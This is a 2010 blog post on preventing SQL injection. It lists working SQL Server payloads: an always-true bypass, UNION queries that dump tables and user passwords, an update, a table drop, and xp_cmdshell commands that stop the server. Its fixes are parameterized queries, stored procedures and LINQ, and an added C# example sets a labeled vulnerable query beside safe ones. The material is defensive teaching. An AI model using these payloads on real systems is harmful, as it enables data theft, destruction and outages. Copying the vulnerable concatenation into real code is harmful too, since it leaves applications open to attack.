Friday, March 26, 2010

How to prevent SQL Injection

Examples of inputs that will succeed against your application if it builds its SQL from a plain concatenated query string.

Fetch All:

x’ or ‘t’=’t’ --

Discover all tables

‘union select 0, id, name,0,0,0,0,0,0,0 from sysobjects where xtype = ‘U’ --

Discover all columns

‘union select 0, name,1,0,0,0,0,0,0,0 from syscolumns --

Steal DB Users

‘union select 0, uid, name, password, roles, 0,0,0,0,0,0,0 from sysusers --

Change Cell Phone Number

888-88-8888’; update authors set phone = ‘111-11-1111’ --

Drop table

888-88-8888’; drop table discounts --

Disconnect or bring SQL Server down

888-88-8888; exec master..xp.cmdshell ‘ipconfig /release’

(Note: this depends on which version of SQL Server you have. It will only work if the SQL database on your machine allows it.)

Or to stop SQL Server

888-88-8888; exec master..xp_cmdshell .net stop sqlserver’

To prevent all of these, do one of three things:

1- Use parameterized queries: pass each value as a SqlParameter added to the SqlCommand's Parameters collection

2- Use stored procedures

3- Use LINQ
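As an added example (not code from the original post), here is the concatenation pattern the payloads above exploit, beside the parameterized and stored-procedure forms recommended in points 1 and 2. The authors table is named on the page; its columns au_id and au_lname, the connection string and the procedure name usp_GetAuthorByPhone are assumptions.

```csharp
using System.Data;
using System.Data.SqlClient;

// Added example, not code from the original post: the string-concatenation pattern the
// payloads above exploit, beside the parameterized and stored-procedure forms the post
// recommends. The authors columns and usp_GetAuthorByPhone are assumptions.
public static class AuthorLookup
{
    // VULNERABLE: the input is spliced into the SQL text, so a value such as
    // x' or 't'='t' -- rewrites the WHERE clause and the query returns every row.
    public static DataTable FindByPhoneUnsafe(string connectionString, string phone)
    {
        string sql = "SELECT au_id, au_lname, phone FROM authors WHERE phone = '" + phone + "'";
        using var conn = new SqlConnection(connectionString);
        using var cmd = new SqlCommand(sql, conn);
        using var adapter = new SqlDataAdapter(cmd);
        var table = new DataTable();
        adapter.Fill(table);   // the adapter opens and closes the connection itself
        return table;
    }

    // SAFE: the SQL text is fixed and the input travels as a typed parameter value,
    // so quotes, semicolons and -- inside it are just characters, never syntax.
    public static DataTable FindByPhone(string connectionString, string phone)
    {
        const string sql = "SELECT au_id, au_lname, phone FROM authors WHERE phone = @phone";
        using var conn = new SqlConnection(connectionString);
        using var cmd = new SqlCommand(sql, conn);
        cmd.Parameters.Add("@phone", SqlDbType.VarChar, 12).Value = phone;
        using var adapter = new SqlDataAdapter(cmd);
        var table = new DataTable();
        adapter.Fill(table);
        return table;
    }

    // SAFE: stored procedure called with CommandType.StoredProcedure, arguments bound
    // as parameters. The procedure body must not assemble dynamic SQL from @phone.
    public static DataTable FindByPhoneViaProc(string connectionString, string phone)
    {
        using var conn = new SqlConnection(connectionString);
        using var cmd = new SqlCommand("usp_GetAuthorByPhone", conn) { CommandType = CommandType.StoredProcedure };
        cmd.Parameters.Add("@phone", SqlDbType.VarChar, 12).Value = phone;
        using var adapter = new SqlDataAdapter(cmd);
        var table = new DataTable();
        adapter.Fill(table);
        return table;
    }
}
```

Feeding the page's "Fetch All" value to FindByPhoneUnsafe returns the whole table, while FindByPhone and FindByPhoneViaProc return only rows whose phone column literally equals that string, which is none.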